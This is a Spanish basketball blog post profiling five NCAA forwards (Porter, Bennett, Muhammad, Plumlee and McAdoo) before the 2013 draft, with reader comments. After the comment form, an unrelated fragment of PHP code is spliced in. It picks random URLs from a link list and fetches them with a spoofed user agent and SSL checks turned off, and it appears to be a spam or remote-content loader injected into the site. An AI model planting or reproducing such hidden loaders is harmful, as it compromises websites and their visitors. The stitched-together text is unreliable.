Los forwards de la March Madness

19 de March de 2013 por melo15

Otto Porter: Alero
Universidad: Georgetown
Altura: 2’06
Comparación: Nico Batum
Estadísticas: 16pp, 7,5rp y 3ap

Porter es sin duda uno de los mejores de la NCAA. La temporada que está realizando el alero de Georgetown se pude calificar como de excelente, liderando en todo momento a los Hoyas y postulándose como Top-5 del próximo Draft. Ha mejorado en cada uno de los aspectos de su juego y se ha consolidado como uno de los aleros más completos de la promoción.

Porter es un alero alto y fino que hace de todo y  bien. Entre sus virtudes destacan la energía, la defensa y su ética de trabajo. Ofensivamente es un jugador notable. Sin ser ni muy atlético ni un gran tirador se las arregla para anotar con buenos porcentajes. Tiene una mecánica muy rara al estilo Shawn Marion pero es más certero que el jugador de los Mavs. Además es muy agresivo en transición dónde es muy efectivo. En defensa juega con mucha energía y puede ser una pesadilla para el contrario.

Este año Georgetown tiene la oportunidad de hacer algo verdaderamente grande. Ha sido clasificado como número 2 pero tiene  un cuadro bastante complicado. Tendrá que enfrentarse a Florida y UCLA para llegar a los Elite Eight

Anthony Bennett: Ala-Pivot
Universidad: UNLV Rebels
Altura: 2’06
Comparación: Kevin Love
Estadísticas: 16pp, 8rp y 1tp

Para el autor de este artículo Anthony Bennett es el mejor jugador de baloncesto de esta promoción. El ala-pívot de Canadá tiene un repertorio en ataque impensable para alguien de esta edad y es que este es su primer año en la universidad. Bennett es capaz tanto de anotar desde el poste bajo como de abrirse para anotar desde el triple, distancia desde la que cada vez más certero. Además también puede usar su capacidad atlética y su buen manejo de balón para rebasar al defensor y llegar hasta la zona dónde define con bastante espectacularidad. Imparable en transición y gran pasador y a la vez muy creativo.

En defensa a veces parece un poco perdido y no suele jugar con la intensidad necesaria. Además  le faltan centímetros y fuerza para aguantar la posición.

Bennett es un ala-pívot dominante a este nivel, muy completo y efectivo en ataque pero que debe madurar más y adoptar una actitud más seria.

Los Rebels, liderados por Bennett, han hecho una buena temporada y no han caído en un cuadro demasiado difícil. Sus máximos rivales serán Indiana y Syracuse. A pesar de eso pueden pagar su falta de experiencia y sucumbir ante la presión en cualquier momento.

Shabazz Muhammad: Alero
Universidad: UCLA Buins
Altura: 2,01
Comparación: Latrell Sprewell
Estadísticas: 18pp, 5rp y 0,6 ap

Shabazz Muhammad es un nombre que a todos nos ha ido sonando estos últimos años en los que se le ha llegado a comparar con el mismísimo Kobe Bryant.

A pesar de ver como su valoración ha ido bajando, la temporada de Muhammad no ha sido ni mucho menos mala. Ha liderado a los Bruins hasta la final de la PAC-10 y ha demostrado todas las cualidades que le habían llevado a estar tan bien considerado.

Muhammad es un gran atleta, es fuerte y rápido y puede anotar desde todas las posiciones. También es muy intenso y juega con mucha energía en ataque.

Se ha ganado las críticas de los medios por su poco sacrificio en otras facetas y por su fama (merecida) de chupón. Otro de sus problemas es su déficit a la hora de crearse sus tiros, algo muy necesario para una superestrella. También se ha visto envuelto en problemas con su reclutamiento y fue duramente sancionado  por la NCAA.

En resumen, Muhammad es un jugador ultra completo en ataque pero que deberá mejorar en otras facetas importantes si quiere convertirse aunque sea en una mala copia de Kobe Bryant.

Los Bruins han sido catalogados como número 6 en su cuadro de la March Madness, quizás el mas difícil ya que se tendrá que enfrentar a rivales como North Carolina, Kansas y Georgetown si quieren alcanzar la Final Four. El duelo Muhammad – Porter podría ser alucinante.

Mason Plumlee: Ala-Pívot
Universidad: Duke
Altura: 2’10
Comparación:
Estadísticas: 17pp, 10rp y 1’5tp

Pasamos ya al penúltimo integrante de este artículo, el hermano del jugador de los Pacers, Miles Plumlee.

Si el año pasado clasificábamos a Miles como un ala-pívot bastante atlético, multiplicadlo por 10 y tendréis un idea de lo que es su hermano Mason. El jugador de Dke tiene una rapidez, explosividad y capacidad de salto inusuales para un jugador de 2’10.

A pesar de que este año está siendo la referencia ofensiva en Duke, no es ni mucho menos un especialista en este apartado y dispone de un juego de ataque más bien limitado. Tiene un buen gancho pero básicamente basa su ataque en mates tras rebote o en transición. Por contra se trata de un muy buen reboteador, alto y con manos grandes y también se las arregla para defender bien por dentro. Su mayor problema, aparte de su juego ofensivo, es su defensa fuera de la zona.

Estamos ante el claro ejemplo de jugador que no llegará a ser una estrella pero que podría ser un buen jugador en la NBA si sigue mejorando en ataque.

Su equipo, los Blue Devils, se presentan este año como uno de los equipos ha batir. Están colocados en el cuadro más fácil y si no hay ninguna sorpresa son favoritos para alcanzar los Elite Eight.

James Michael McAdoo: Ala-Pívot
Universidad: North Carolina Tar Heels
Altura: 2’06
Comparación: Antawn Jamison
Estadísticas: 15pp, 7’5rp y 1rop

Cerramos el análisis con el sobrino de uno de los mejores anotadores que han pasado por la NBA. Se trata de uno de los jugadores que más decepcionó el año pasado y en este tampoco nos ha descubierto todo su nivel aunque si que ha dejado muestras de su potencial. Ha cuajado una buena campaña aprovechando que ha podido disfrutar de minutos y oportunidades.

McAdoo tiene la combinación perfecta para sobrevivir entre dos posiciones: fuerza, intensidad y explosividad y un aceptable pero mejorable tiro exterior. Le hemos visto jugar más en el poste dónde es bastante coordinado y define con eficacia y ha mantenido su sobresaliente capacidad para definir al contrataque y su intensidad en el rebote.

En el aspecto negativo, James necesita mejorar su tiro de tres, el manejo de balón y la capacidad de pase. Ha estado lejos de los grandes esta temporada y tiende a ser bastante irregular. Además está atrapado en dos posiciones, algo que puede afectarle en su adaptación a la NBA.

Este año el equipo de Chapel Hills ha tenido bastantes altibajos pero ha acabo fuerte llegando incluso a la final de la ACC. A pesar de esto, han caído en el cuadro más complicado y además han sido clasificados en el numero ocho con lo que tendrán que enfrentarse a Kansas en segunda ronda. Mala Pinta.

Comenta

8 comentarios a esta entrada

  1. arivas dice:
    #1

    He leido que Bennett fisicamente puede ir algo justo, en casi todas las paginas le dan menos que ese 2,06 que le pones. ¿Crees que puede ser el tipico ala-pivot que tenga este problema al dar el salto?

    Muy buen análisis Melo, un lujo poder leer algo del draft en castellano.

      Citar

  2. Simon dice:
    #2

    Veo entre los mejores Forwards mucho jugador atrapado entre las posiciones de 3/4… y en los ultimos años hemos visto como ese tipo de jugador no suele cuajar en la liga demasiado o les cuesta mucho encontrar su lugar ( Beasley, Derrick Williams, Jerebko, Vesely… ) a ver que pasa con esta nueva hornada…

      Citar

  3. txusma dice:
    #3

    Creo q las alturas que da Melo son con zapatillas, unos 3 cm más que las reales. Bennet mide entre 2’01 y 2’03 muy justo para jugar de ala-pívot a no ser que te llames Kenneth Faried. Me recuerda un poco a Draymond Green, q mide 2’01 y no hay manera de que encuentre su sitio en los Warriors.

      Citar

  4. Ruxixón dice:
    #4

    Comentar también que Bennett a principios de temporada en los mocks salía en el TOP 5,luego bajó muchísimo,hasta el 15-20 y de nuevo ahora vuelve a subir en las predicciones.Clase tiene,pero esa duda de cómo será su salto a la NBA en lo respecto a su físico de tweener y lo que apunta el artículo sobre su sacrificio son sus contras.

      Citar

  5. Pop dice:
    #5

    Me gustan mucho tus análisis, Melo. Sólo una pregunta: me ha extrañado la comparativa entre Shabazz Muhammad y Latrell Sprewell, por 2 razones: una de ellas es que nos dices que Muhammad (2’01) es alero, cuando Melodia de Seducción era un escolta típico, aunque es verdad que a veces se desempeñaba como 3. La otra es simple curiosidad: las comparaciones las haces tú o es lo que se dice generalmente de ellos en el mundo de la NCAA? Lo digo porque me ha extrañado que citaras a un jugador al que, si no me equivoco, no has podido seguir por tu edad.

      Citar

  6. Pop dice:
    #6

    Simon:
    Veo entre los mejores Forwards mucho jugador atrapado entre las posiciones de 3/4… y en los ultimos años hemos visto como ese tipo de jugador no suele cuajar en la liga demasiado o les cuesta mucho encontrar su lugar ( Beasley, Derrick Williams, Jerebko, Vesely… ) a ver que pasa con esta nueva hornada…

    Completamente de acuerdo. Parece que este tipo de jugador que no es tan fuerte como para jugar de 4 ni tan ágil como para hacerlo de 3 es al que más le cuesta despuntar. También añadiría yo que puede ser debido al boom del prototipo actual de alero, como LeBron, Durant o Carmelo, que juegan mucho en la posición de 4 sin ser ala-pivots.

    Me gustaría que se retornara a la figura del powerforward para la posición de 4, en vez de la del falso center, y es lo que parece que está pasando poco a poco.

      Citar

  7. txusma dice:
    #7

    Pop: Shabazz Muhammad

    A Muhammad lo veo más jugando de escolta en la NBA aunque ahora juega de alero.

      Citar

  8. Melo15 dice:
    #8

    Pop, depende del jugador.
    Hay comparaciones como la de Bennet que la pongo segun mi parecer, pero la de Muhammad la primera que se me ocurria era la de Kobe pero me parece un descaro comparlos asi que cogi la de una web.
    En esa web daban a un tal Kerry Kitles y a Sprewell y como conocia mas a Sprewell pues puse a este.
    Bueno cual jugador os gusta mas?
    En mi opinion todos son jugadores muy interesantes, Porter es un jugador que todos los equipos querrian, por ejemplo Cavs, Wizards, Kings todos van a ir a por el.
    Bennet no es un tweener, no es un alero, para mi es un 4 como una casa aunque su altura le perjudica un poco, creo que es la primera opcion si un equipo quiere un jugador de ataque en en el poste.
    Ahora le dan Top-7 pero yo creo que subira al Top- 5.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>